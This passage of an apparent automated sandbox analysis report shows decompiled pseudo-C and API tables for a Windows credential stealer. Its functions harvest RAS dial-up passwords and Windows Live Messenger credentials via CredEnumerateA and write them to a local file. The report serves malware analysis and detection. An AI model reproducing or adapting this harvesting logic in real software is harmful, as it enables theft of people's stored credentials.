					__eax = E00401AE4( &_v32, 2);
					__eax =  &_v24;
					__edx =  *0x408214; // 0x408218
					return E00402FC8( &_v24, __edx);
				}
			}


































                                    0x00408230
                                    0x00408231
                                    0x00408232
                                    0x00408234
                                    0x004081c8
                                    0x004081cf
                                    0x004081ef
                                    0x00408238
                                    0x00408238
                                    0x00408239
                                    0x0040823b
                                    0x00408241
                                    0x00408242
                                    0x00408243
                                    0x00408244
                                    0x00408246
                                    0x0040824c
                                    0x00408252
                                    0x00408258
                                    0x0040825e
                                    0x00408261
                                    0x00408264
                                    0x00408267
                                    0x0040826a
                                    0x0040826d
                                    0x00408270
                                    0x00408273
                                    0x00408275
                                    0x00408276
                                    0x0040827b
                                    0x0040827e
                                    0x00408284
                                    0x0040828e
                                    0x00408291
                                    0x00408295
                                    0x0040829b
                                    0x0040829e
                                    0x0040829f
                                    0x004082a2
                                    0x004082a7
                                    0x004082ad
                                    0x004082b2
                                    0x004082b5
                                    0x004082b8
                                    0x004082bd
                                    0x004082bf
                                    0x004082bf
                                    0x004082c2
                                    0x004082c5
                                    0x004082c8
                                    0x004082c9
                                    0x004082cc
                                    0x004082cd
                                    0x004082d0
                                    0x004082d1
                                    0x004082d3
                                    0x004082d5
                                    0x004082da
                                    0x004082dc
                                    0x004082e2
                                    0x004082f3
                                    0x004082f8
                                    0x004082fb
                                    0x00408300
                                    0x00408305
                                    0x00408308
                                    0x0040830d
                                    0x00408312
                                    0x00408319
                                    0x0040831b
                                    0x00408322
                                    0x00408324
                                    0x00408326
                                    0x00408328
                                    0x0040832b
                                    0x00408330
                                    0x00408331
                                    0x00408333
                                    0x00408338
                                    0x0040833a
                                    0x0040833c
                                    0x00408345
                                    0x0040834a
                                    0x00408353
                                    0x00408353
                                    0x00408358
                                    0x0040835a
                                    0x0040835c
                                    0x0040835f
                                    0x00408364
                                    0x00408365
                                    0x00408367
                                    0x0040836c
                                    0x0040836e
                                    0x00408370
                                    0x00408379
                                    0x0040837e
                                    0x00408387
                                    0x00408387
                                    0x0040838c
                                    0x0040838c
                                    0x00408322
                                    0x00408391
                                    0x00408398
                                    0x0040839b
                                    0x0040839c
                                    0x0040839e
                                    0x004083a5
                                    0x004083a8
                                    0x004083a8
                                    0x004083aa
                                    0x004083aa
                                    0x004083b6
                                    0x004083b9
                                    0x004083bb
                                    0x004083be
                                    0x004083c2
                                    0x004083c8
                                    0x004083d2
                                    0x004083d5
                                    0x004083d6
                                    0x004083dc
                                    0x004083dd
                                    0x004083df
                                    0x004083e4
                                    0x004083eb
                                    0x004083f1
                                    0x004083f3
                                    0x004083fb
                                    0x004083fe
                                    0x0040840a
                                    0x0040840e
                                    0x00408411
                                    0x00408415
                                    0x0040841d
                                    0x00408422
                                    0x00408429
                                    0x0040842f
                                    0x00408436
                                    0x0040843c
                                    0x0040843f
                                    0x00408442
                                    0x00408450
                                    0x00408450
                                    0x00408453
                                    0x00408459
                                    0x0040845e
                                    0x00408464
                                    0x0040846c
                                    0x00408479
                                    0x0040847c
                                    0x00408481
                                    0x00408489
                                    0x0040848b
                                    0x0040848d
                                    0x0040848f
                                    0x00408492
                                    0x004084a5
                                    0x004084a5
                                    0x004084a7
                                    0x004084a9
                                    0x004084ae
                                    0x004084bb
                                    0x004084be
                                    0x004084c9
                                    0x004084c9
                                    0x004084cb
                                    0x004084cd
                                    0x004084d2
                                    0x004084df
                                    0x004084e2
                                    0x004084ed
                                    0x004084ed
                                    0x004084ef
                                    0x004084f1
                                    0x004084f3
                                    0x004084f5
                                    0x004084f5
                                    0x004084ff
                                    0x00408504
                                    0x0040850d
                                    0x00408512
                                    0x00408517
                                    0x0040851c
                                    0x0040851c
                                    0x0040851e
                                    0x00408521
                                    0x00408526
                                    0x00408528
                                    0x0040852c
                                    0x0040852e
                                    0x0040852e
                                    0x00408536
                                    0x00408537
                                    0x00408537
                                    0x0040853f
                                    0x00408541
                                    0x00408547
                                    0x00408548
                                    0x00408548
                                    0x0040852c
                                    0x0040854d
                                    0x00408550
                                    0x00408550
                                    0x00408550
                                    0x0040851c
                                    0x00408444
                                    0x00408444
                                    0x00408447
                                    0x0040844a
                                    0x00000000
                                    0x00000000
                                    0x0040844a
                                    0x00408442
                                    0x00408436
                                    0x00408553
                                    0x00408559
                                    0x0040855b
                                    0x0040855d
                                    0x00408563
                                    0x00408565
                                    0x00408567
                                    0x0040856a
                                    0x0040856c
                                    0x00408571
                                    0x00408577
                                    0x0040857d
                                    0x00408582
                                    0x00408588
                                    0x0040858d
                                    0x00408593
                                    0x00408599
                                    0x0040859e
                                    0x004085a4
                                    0x004085a9
                                    0x004085ae
                                    0x004085b1
                                    0x004085b6
                                    0x004085b6
                                    0x00408565
                                    0x004085bb
                                    0x004085bc
                                    0x004085bc
                                    0x004085bc
                                    0x004085bc
                                    0x004083aa
                                    0x0040839e
                                    0x004082dc
                                    0x004085c5
                                    0x004085c5
                                    0x004085c7
                                    0x004085c8
                                    0x004085c9
                                    0x004085ca
                                    0x004085cd
                                    0x004085d2
                                    0x004085d8
                                    0x004085dd
                                    0x004085e2
                                    0x004085e8
                                    0x004085ed
                                    0x004085f2
                                    0x004085f5
                                    0x004085fa
                                    0x004085ff
                                    0x00408602
                                    0x00408607
                                    0x0040860c
                                    0x0040860f
                                    0x0040861a
                                    0x0040861a

                                    APIs
                                      • Part of subcall function 00407FF0: RasEnumEntriesA.RASAPI32(00000000,00000000,?,?,?), ref: 00408017
                                    • RasEnumEntriesA.RASAPI32(00000000,00000000,?,?,?), ref: 004082D5
                                    • GetVersionExA.KERNEL32(00000094), ref: 004082F3
                                    • SHGetSpecialFolderPathA.SHELL32(00000000,00000000,0000001A,00000000,00000094), ref: 00408333
                                    • SHGetSpecialFolderPathA.SHELL32(00000000,00000000,00000023,00000000,00000000,00000000,0000001A,00000000,00000094), ref: 00408367
                                      • Part of subcall function 00407F4C: lstrlen.KERNEL32(00000000,?,?,0040837E,00000000,00000000,00000023,00000000,00000000,00000000,0000001A,00000000,00000094), ref: 00407F68
                                    • RasGetEntryDialParamsA.RASAPI32(00000000,0000041C,FFFFFFFF), ref: 004083DF
                                    • GetPrivateProfileIntA.KERNEL32(00000000,DialParamsUID,00000000,00000000), ref: 00408484
                                    • GetPrivateProfileIntA.KERNEL32(00000000,DialParamsUID,00000000,00000000), ref: 004084A0
                                    • GetPrivateProfileIntA.KERNEL32(00000000,DialParamsUID,00000000,00000000), ref: 004084C4
                                    • GetPrivateProfileIntA.KERNEL32(00000000,DialParamsUID,00000000,00000000), ref: 004084E8
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.554462336.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000009.00000002.554444506.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.554509749.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.554595376.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.555075872.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.555106907.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: PrivateProfile$EntriesEnumFolderPathSpecial$DialEntryParamsVersionlstrlen
                                    • String ID: DialParamsUID$RAS Passwords |$RasGetEntryProperties
                                    • API String ID: 606077693-541967613
                                    • Opcode ID: 1ab6e728647767d20885926d8c5f550152f1a8eb9b5063f4c77c40aaee44733b
                                    • Instruction ID: 6468358b1ab4b7f73c56054985f5742c7a8c8687d669c1df658abded6e8fa1dc
                                    • Opcode Fuzzy Hash: 1ab6e728647767d20885926d8c5f550152f1a8eb9b5063f4c77c40aaee44733b
                                    • Instruction Fuzzy Hash: 88C10F70A002199FDB10EBA5CD81BDEB7B9EF44308F1045BBE544B72D1DB78AE458B68
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00408238, Relevance: 19.5, APIs: 9, Strings: 2, Instructions: 277COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 69%
                                    			E00408238(intOrPtr* __eax, void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _v8;
				signed int _v12;
				char _v16;
				signed int _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				struct _OSVERSIONINFOA _v200;
				char _v476;
				char _v733;
				char _v1248;
				char _v1252;
				signed int _v3020;
				char _v3024;
				char _v3028;
				char _v3284;
				char _v3288;
				char _v3292;
				char _t130;
				void* _t138;
				CHAR* _t167;
				void* _t181;
				CHAR* _t185;
				CHAR* _t190;
				void* _t199;
				void* _t201;
				int _t215;
				intOrPtr* _t216;
				signed int* _t222;
				void* _t223;
				intOrPtr _t225;
				intOrPtr _t230;
				CHAR* _t253;
				void* _t254;
				signed int _t256;
				void* _t259;

				_t255 = __esi;
				_t252 = __edi;
				_t211 = __ebx;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v3288 = 0;
				_v3292 = 0;
				_v3028 = 0;
				_v3024 = 0;
				_v24 = 0;
				_v28 = 0;
				_v32 = 0;
				_v40 = 0;
				_v44 = 0;
				_v48 = 0;
				_v8 = __eax;
				_push(_t259);
				_push(0x40861b);
				_push( *[fs:eax]);
				 *[fs:eax] = _t259 + 0xfffff328;
				E00401AC0(_v8);
				_v20 = E00407FF0();
				if(_v20 != 0) {
					_push(_v20);
					E00402FBC();
					 *_v24 = 0x108;
					_v12 = 0x108 * _v20;
					_push( &_v20);
					_push( &_v12);
					_t130 = _v24;
					_push(_t130);
					_push(0);
					_push(0);
					L00407B84();
					if(_t130 == 0) {
						_v200.dwOSVersionInfoSize = 0x94;
						GetVersionExA( &_v200);
						E00402074( &_v28, 0x105);
						E00402074( &_v32, 0x105);
						if(_v200.dwPlatformId == 2 && _v200.dwMajorVersion >= 5) {
							_push(0);
							_push(0x1a);
							_t199 = E00401F9C( &_v28);
							_push(_t199);
							_push(0);
							L00407B7C();
							_t267 = _t199;
							if(_t199 != 0) {
								E00407F4C(_v28,  &_v3024, _t267);
								E00401B58( &_v28, _v3024);
							}
							_push(0);
							_push(0x23);
							_t201 = E00401F9C( &_v32);
							_push(_t201);
							_push(0);
							L00407B7C();
							_t268 = _t201;
							if(_t201 != 0) {
								E00407F4C(_v32,  &_v3028, _t268);
								E00401B58( &_v32, _v3028);
							}
							E00407E40(_t211, 1, _t252, _t255, _t268);
						}
						_v36 = 0xffffffff;
						_t138 = _v20 - 1;
						if(_t138 >= 0) {
							_v52 = _t138 + 1;
							_t256 = 0;
							do {
								_v1252 = 0x41c;
								_t214 = (_t256 << 5) + _t256;
								E00401258(_v24 + 4 + ((_t256 << 5) + _t256) * 8, 0x100,  &_v1248);
								_push( &_v36);
								_push( &_v1252);
								_push(0);
								L00407B8C();
								_v12 = 0x6e8;
								E00401414( &_v3020, _v12);
								_v3020 = _v12;
								_t222 =  &_v3020;
								E004081BC(0, _v24 + 4 + ((_t256 << 5) + _t256) * 8,  &_v16, 0,  &_v12);
								if(_v200.dwPlatformId == 2 && _v200.dwMajorVersion >= 5) {
									if( *_v28 != 0) {
										L15:
										E00401CAC( &_v40,  &_v1248);
										E00403268(_v40, _t214, _t222,  &_v44, _t256, _t274);
										_t167 = E00401F9C( &_v28);
										_t253 = E00401F48(_v40);
										_t215 = GetPrivateProfileIntA(_t253, "DialParamsUID", 0, _t167);
										if(_t215 == 0) {
											_t215 = GetPrivateProfileIntA(_t253, "DialParamsUID", 0, E00401F9C( &_v32));
										}
										if(_t215 == 0) {
											_t190 = E00401F9C( &_v28);
											_t215 = GetPrivateProfileIntA(E00401F48(_v44), "DialParamsUID", 0, _t190);
										}
										if(_t215 == 0) {
											_t185 = E00401F9C( &_v32);
											_t215 = GetPrivateProfileIntA(E00401F48(_v44), "DialParamsUID", 0, _t185);
										}
										if(_t215 > 0) {
											E00402BC0( &_v3284, _t215, 0);
											E00401D18( &_v48,  &_v3284, 0);
											_t254 = 0x100;
											_t216 = 0x40e9bc;
											do {
												E00401E94( *_t216, _v48);
												if(0 == 0 &&  *((intOrPtr*)(_t216 + 4)) != 0) {
													_t87 = _t216 + 4; // 0x0
													_push(E00401D50( *_t87));
													_t88 = _t216 + 4; // 0x0
													_t181 = E00401F48( *_t88);
													_pop(_t223);
													E00408038( &_v476, _t223, _t181);
												}
												_t216 = _t216 + 8;
												_t254 = _t254 - 1;
											} while (_t254 != 0);
										}
									} else {
										_t274 =  *_v32;
										if( *_v32 != 0) {
											goto L15;
										}
									}
								}
								if( &_v733 != 0 &&  &_v476 != 0) {
									_push( *_v8);
									_push("RAS Passwords |");
									E00401CAC( &_v3288,  &_v733);
									_push(_v3288);
									_push(0x40865c);
									E00401CAC( &_v3292,  &_v476);
									_push(_v3292);
									_push(0x40865c);
									_push(0x408668);
									E00401E10();
								}
								_t256 = _t256 + 1;
								_t100 =  &_v52;
								 *_t100 = _v52 - 1;
							} while ( *_t100 != 0);
						}
					}
				}
				_pop(_t225);
				 *[fs:eax] = _t225;
				_push(E00408622);
				E00401AE4( &_v3292, 2);
				E00401AE4( &_v3028, 2);
				E00401AE4( &_v48, 3);
				E00401AE4( &_v32, 2);
				_t230 =  *0x408214; // 0x408218
				return E00402FC8( &_v24, _t230);
			}












































                                    0x00408238
                                    0x00408238
                                    0x00408238
                                    0x00408241
                                    0x00408242
                                    0x00408243
                                    0x00408246
                                    0x0040824c
                                    0x00408252
                                    0x00408258
                                    0x0040825e
                                    0x00408261
                                    0x00408264
                                    0x00408267
                                    0x0040826a
                                    0x0040826d
                                    0x00408270
                                    0x00408275
                                    0x00408276
                                    0x0040827b
                                    0x0040827e
                                    0x00408284
                                    0x0040828e
                                    0x00408295
                                    0x0040829e
                                    0x004082ad
                                    0x004082bd
                                    0x004082c2
                                    0x004082c8
                                    0x004082cc
                                    0x004082cd
                                    0x004082d0
                                    0x004082d1
                                    0x004082d3
                                    0x004082d5
                                    0x004082dc
                                    0x004082e2
                                    0x004082f3
                                    0x00408300
                                    0x0040830d
                                    0x00408319
                                    0x00408324
                                    0x00408326
                                    0x0040832b
                                    0x00408330
                                    0x00408331
                                    0x00408333
                                    0x00408338
                                    0x0040833a
                                    0x00408345
                                    0x00408353
                                    0x00408353
                                    0x00408358
                                    0x0040835a
                                    0x0040835f
                                    0x00408364
                                    0x00408365
                                    0x00408367
                                    0x0040836c
                                    0x0040836e
                                    0x00408379
                                    0x00408387
                                    0x00408387
                                    0x0040838c
                                    0x0040838c
                                    0x00408391
                                    0x0040839b
                                    0x0040839e
                                    0x004083a5
                                    0x004083a8
                                    0x004083aa
                                    0x004083aa
                                    0x004083b9
                                    0x004083cd
                                    0x004083d5
                                    0x004083dc
                                    0x004083dd
                                    0x004083df
                                    0x004083e4
                                    0x004083f6
                                    0x004083fe
                                    0x00408415
                                    0x0040841d
                                    0x00408429
                                    0x00408442
                                    0x00408450
                                    0x00408459
                                    0x00408464
                                    0x0040846c
                                    0x00408481
                                    0x00408489
                                    0x0040848d
                                    0x004084a5
                                    0x004084a5
                                    0x004084a9
                                    0x004084ae
                                    0x004084c9
                                    0x004084c9
                                    0x004084cd
                                    0x004084d2
                                    0x004084ed
                                    0x004084ed
                                    0x004084f1
                                    0x004084ff
                                    0x0040850d
                                    0x00408512
                                    0x00408517
                                    0x0040851c
                                    0x00408521
                                    0x00408526
                                    0x0040852e
                                    0x00408536
                                    0x00408537
                                    0x0040853a
                                    0x00408547
                                    0x00408548
                                    0x00408548
                                    0x0040854d
                                    0x00408550
                                    0x00408550
                                    0x0040851c
                                    0x00408444
                                    0x00408447
                                    0x0040844a
                                    0x00000000
                                    0x00000000
                                    0x0040844a
                                    0x00408442
                                    0x0040855b
                                    0x0040856a
                                    0x0040856c
                                    0x0040857d
                                    0x00408582
                                    0x00408588
                                    0x00408599
                                    0x0040859e
                                    0x004085a4
                                    0x004085a9
                                    0x004085b6
                                    0x004085b6
                                    0x004085bb
                                    0x004085bc
                                    0x004085bc
                                    0x004085bc
                                    0x004083aa
                                    0x0040839e
                                    0x004082dc
                                    0x004085c7
                                    0x004085ca
                                    0x004085cd
                                    0x004085dd
                                    0x004085ed
                                    0x004085fa
                                    0x00408607
                                    0x0040860f
                                    0x0040861a

                                    APIs
                                      • Part of subcall function 00407FF0: RasEnumEntriesA.RASAPI32(00000000,00000000,?,?,?), ref: 00408017
                                    • RasEnumEntriesA.RASAPI32(00000000,00000000,?,?,?), ref: 004082D5
                                    • GetVersionExA.KERNEL32(00000094), ref: 004082F3
                                    • SHGetSpecialFolderPathA.SHELL32(00000000,00000000,0000001A,00000000,00000094), ref: 00408333
                                    • SHGetSpecialFolderPathA.SHELL32(00000000,00000000,00000023,00000000,00000000,00000000,0000001A,00000000,00000094), ref: 00408367
                                      • Part of subcall function 00407F4C: lstrlen.KERNEL32(00000000,?,?,0040837E,00000000,00000000,00000023,00000000,00000000,00000000,0000001A,00000000,00000094), ref: 00407F68
                                    • RasGetEntryDialParamsA.RASAPI32(00000000,0000041C,FFFFFFFF), ref: 004083DF
                                    • GetPrivateProfileIntA.KERNEL32(00000000,DialParamsUID,00000000,00000000), ref: 00408484
                                    • GetPrivateProfileIntA.KERNEL32(00000000,DialParamsUID,00000000,00000000), ref: 004084A0
                                    • GetPrivateProfileIntA.KERNEL32(00000000,DialParamsUID,00000000,00000000), ref: 004084C4
                                    • GetPrivateProfileIntA.KERNEL32(00000000,DialParamsUID,00000000,00000000), ref: 004084E8
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.554462336.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000009.00000002.554444506.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.554509749.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.554595376.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.555075872.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.555106907.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: PrivateProfile$EntriesEnumFolderPathSpecial$DialEntryParamsVersionlstrlen
                                    • String ID: DialParamsUID$RAS Passwords |
                                    • API String ID: 606077693-3751168726
                                    • Opcode ID: fbe06dde2b49a42d26d1befe1d029615117769fb4e2dbfe38565cae11eece56a
                                    • Instruction ID: 7375f334a108091beab50651aa9ecc72c5d4f12faf085ce0e41049e672a00ba2
                                    • Opcode Fuzzy Hash: fbe06dde2b49a42d26d1befe1d029615117769fb4e2dbfe38565cae11eece56a
                                    • Instruction Fuzzy Hash: 45B12070E002199BDB10EFA5CD82BDEB7B9AF44308F1045BBE544B72D1DB78AE458B58
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00409D28, Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 109libraryloaderCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 60%
                                    			E00409D28(intOrPtr* __eax, void* __ebx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				struct HINSTANCE__* _v16;
				char _v20;
				char _v24;
				intOrPtr _v28;
				char _v32;
				char _v36;
				void* _t47;
				intOrPtr* _t70;
				void* _t74;
				intOrPtr _t76;
				intOrPtr _t78;
				signed int _t90;
				void* _t91;
				intOrPtr _t93;

				_t89 = __esi;
				_t70 = __eax;
				 *[fs:eax] = _t93;
				E00401AC0(__eax);
				_v16 = LoadLibraryA("advapi32.dll");
				 *0x40f1dc = GetProcAddress(_v16, "CredEnumerateA");
				 *0x40f1e0 = GetProcAddress(_v16, "CredFree");
				 *0x40f1dc("WindowsLive:name=*", 0,  &_v12,  &_v8,  *[fs:eax], 0x409e71, _t93, __edi, __esi, __ebx, 0, 0, 0, 0, 0, 0, 0, 0, _t91);
				if(_v12 != 0) {
					_t47 = _v12 - 1;
					if(_t47 >= 0) {
						_v20 = _t47 + 1;
						_t90 = 0;
						do {
							_push( *_t70);
							_push("Messenger|");
							E00401CAC( &_v24,  *((intOrPtr*)( *((intOrPtr*)(_v8 + _t90 * 4)) + 0x30)));
							_push(_v24);
							_push(0x409edc);
							E00401E10();
							_push( *_t70);
							E00409C1C( *((intOrPtr*)( *((intOrPtr*)(_v8 + _t90 * 4)) + 0x1c)), _t70,  &_v32,  *((intOrPtr*)( *((intOrPtr*)(_v8 + _t90 * 4)) + 0x18)),  *((intOrPtr*)(_v8 + _t90 * 4)), _t90);
							_push(_v32);
							_push(0x409edc);
							E00401E10();
							E00401CAC(_t70, E00401F48(_v28));
							_t90 = _t90 + 1;
							_t21 =  &_v20;
							 *_t21 = _v20 - 1;
							_t97 =  *_t21;
						} while ( *_t21 != 0);
					}
					FreeLibrary(_v16);
					_push(E00401D50( *_t70));
					E00406008( &_v36);
					E00401D58( &_v36, "xxxyyyzzz.dat");
					_pop(_t74);
					E00405D70(_v36, _t70, _t74,  *_t70, _t89, _t97);
				}
				_pop(_t76);
				 *[fs:eax] = _t76;
				_push(E00409E78);
				E00401AE4( &_v36, 4);
				_t78 =  *0x409bec; // 0x409bf0
				return E00402FC8( &_v8, _t78);
			}



















                                    0x00409d28
                                    0x00409d38
                                    0x00409d45
                                    0x00409d4a
                                    0x00409d59
                                    0x00409d6a
                                    0x00409d7d
                                    0x00409d91
                                    0x00409d9b
                                    0x00409da4
                                    0x00409da7
                                    0x00409daa
                                    0x00409dad
                                    0x00409daf
                                    0x00409daf
                                    0x00409db1
                                    0x00409dc2
                                    0x00409dc7
                                    0x00409dca
                                    0x00409dd6
                                    0x00409ddb
                                    0x00409de6
                                    0x00409deb
                                    0x00409dee
                                    0x00409dfb
                                    0x00409e0c
                                    0x00409e11
                                    0x00409e12
                                    0x00409e12
                                    0x00409e12
                                    0x00409e12
                                    0x00409daf
                                    0x00409e1b
                                    0x00409e27
                                    0x00409e2b
                                    0x00409e38
                                    0x00409e42
                                    0x00409e43
                                    0x00409e43
                                    0x00409e4a
                                    0x00409e4d
                                    0x00409e50
                                    0x00409e5d
                                    0x00409e65
                                    0x00409e70

                                    APIs
                                    • LoadLibraryA.KERNEL32(advapi32.dll,00000000,00409E71,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00409D54
                                    • GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00409D65
                                    • GetProcAddress.KERNEL32(?,CredFree), ref: 00409D78
                                    • FreeLibrary.KERNEL32(?,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00409E1B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.554462336.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000009.00000002.554444506.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.554509749.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.554595376.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.555075872.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.555106907.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: AddressLibraryProc$FreeLoad
                                    • String ID: CredEnumerateA$CredFree$Messenger|$WindowsLive:name=*$advapi32.dll$xxxyyyzzz.dat
                                    • API String ID: 2256533930-2325380974
                                    • Opcode ID: f9fba9f8a1e8e21ee8b509bdb417b60c27fbde2a90de665e2bcbe9999123e56f
                                    • Instruction ID: 58c175fa7aa483102e543733577c5d45540cb7646ec2fd880dc3ea0f10caa25c
                                    • Opcode Fuzzy Hash: f9fba9f8a1e8e21ee8b509bdb417b60c27fbde2a90de665e2bcbe9999123e56f
                                    • Instruction Fuzzy Hash: 28311D75A00209AFDB01EFA5C842A9EB7B9EB48704B60447BF501B72D2D778ED058B98
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0040806C, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 83libraryloaderCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 77%
                                    			E0040806C(void* __eax, void* __ebx, void* __esi) {
				char _v8;
				char _v12;
				CHAR* _t11;
				struct HINSTANCE__* _t12;
				CHAR* _t18;
				struct HINSTANCE__* _t19;
				CHAR* _t24;
				struct HINSTANCE__* _t25;
				CHAR* _t30;
				struct HINSTANCE__* _t31;
				intOrPtr _t44;
				intOrPtr _t51;

				_push(0);
				_push(0);
				_t48 = __eax;
				_push(_t51);
				_push(0x408182);
				_push( *[fs:eax]);
				 *[fs:eax] = _t51;
				if( *0x40d094 != 0) {
					if( *0x40d098 == 0) {
						E00401D9C( &_v12, 0x4081ac, __eax);
						_t11 = E00401F48(_v12);
						_t12 =  *0x40e9b8; // 0x0
						GetProcAddress(_t12, _t11);
					} else {
						_t18 = E00401F48(__eax);
						_t19 =  *0x40e9b8; // 0x0
						GetProcAddress(_t19, _t18);
					}
					L11:
					_pop(_t44);
					 *[fs:eax] = _t44;
					_push(E00408189);
					return E00401AE4( &_v12, 2);
				}
				 *0x40e9b8 = LoadLibraryA("rasapi32.dll");
				if( *0x40e9b8 == 0) {
					 *0x40e9b8 = LoadLibraryA("rnaph.dll");
					L5:
					if( *0x40e9b8 != 0) {
						_t24 = E00401F48(_t48);
						_t25 =  *0x40e9b8; // 0x0
						if(GetProcAddress(_t25, _t24) != 0) {
							 *0x40d094 = 1;
							 *0x40d098 = 1;
						}
					}
					goto L11;
				}
				E00401D9C( &_v8, 0x4081ac, _t48);
				_t30 = E00401F48(_v8);
				_t31 =  *0x40e9b8; // 0x0
				if(GetProcAddress(_t31, _t30) == 0) {
					goto L5;
				} else {
					 *0x40d094 = 1;
					goto L11;
				}
			}















                                    0x0040806f
                                    0x00408071
                                    0x00408075
                                    0x00408079
                                    0x0040807a
                                    0x0040807f
                                    0x00408082
                                    0x0040808e
                                    0x00408129
                                    0x0040814c
                                    0x00408154
                                    0x0040815a
                                    0x00408160
                                    0x0040812b
                                    0x0040812d
                                    0x00408133
                                    0x00408139
                                    0x0040813e
                                    0x00408167
                                    0x00408169
                                    0x0040816c
                                    0x0040816f
                                    0x00408181
                                    0x00408181
                                    0x0040809e
                                    0x004080aa
                                    0x004080eb
                                    0x004080f0
                                    0x004080f7
                                    0x004080fb
                                    0x00408101
                                    0x00408110
                                    0x00408112
                                    0x00408119
                                    0x00408119
                                    0x00408110
                                    0x00000000
                                    0x004080f7
                                    0x004080b6
                                    0x004080be
                                    0x004080c4
                                    0x004080d3
                                    0x00000000
                                    0x004080d5
                                    0x004080d5
                                    0x00000000
                                    0x004080d5

                                    APIs
                                    • LoadLibraryA.KERNEL32(rasapi32.dll,00000000,00408182,?,?,?,00000000,00000000), ref: 00408099
                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 004080CA
                                    • LoadLibraryA.KERNEL32(rnaph.dll,rasapi32.dll,00000000,00408182,?,?,?,00000000,00000000), ref: 004080E6
                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00408107
                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00408139
                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00408160
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.554462336.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000009.00000002.554444506.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.554509749.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.554595376.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.555075872.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.555106907.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: AddressProc$LibraryLoad
                                    • String ID: rasapi32.dll$rnaph.dll
                                    • API String ID: 2238633743-3306964077
                                    • Opcode ID: 55af25baebdb74a9f019e34cf259ce010ede8285420b2e199dd43019a3ddbeb4
                                    • Instruction ID: b6a237a201236b193b27059562e9ff659002eca3acc9512b3faa464904049123
                                    • Opcode Fuzzy Hash: 55af25baebdb74a9f019e34cf259ce010ede8285420b2e199dd43019a3ddbeb4
                                    • Instruction Fuzzy Hash: 88218070604240AFE765EBB59F42B5A369C9B08308F14487EF184BB3D2CB7C9D96835D
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 004063FC, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 67libraryloaderCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 44%
                                    			E004063FC(long __eax, intOrPtr* __edx) {
				void* _v8;
				void* _t8;
				_Unknown_base(*)()* _t13;
				intOrPtr* _t29;
				intOrPtr _t37;
				long _t43;
				intOrPtr _t47;
				intOrPtr _t49;

				_t47 = _t49;
				_t29 = __edx;
				_t43 = __eax;
				E00401AC0(__edx);
				_t8 = OpenProcess(0x410, 0, _t43);
				_v8 = _t8;
				if(_v8 == 0) {
					return _t8;
				} else {
					_push(_t47);
					_push(0x4064a9);
					_push( *[fs:eax]);
					 *[fs:eax] = _t49;
					E00402074(_t29, 0x104);
					_t13 = GetProcAddress(LoadLibraryA("PSAPI.dll"), "GetModuleFileNameExA");
					_push(0x104);
					_push(E00401F48( *_t29));
					_push(0);
					_push(_v8);
					if( *_t13() <= 0) {
						E00401AC0(_t29);
					} else {
						E00402074(_t29, E004063EC(E00401F48( *_t29)));
					}
					_pop(_t37);
					 *[fs:eax] = _t37;
					_push(0x4064b0);
					return CloseHandle(_v8);
				}
			}











                                    0x004063fd
                                    0x00406403
                                    0x00406405
                                    0x00406409
                                    0x00406416
                                    0x0040641b
                                    0x00406422
                                    0x004064b5
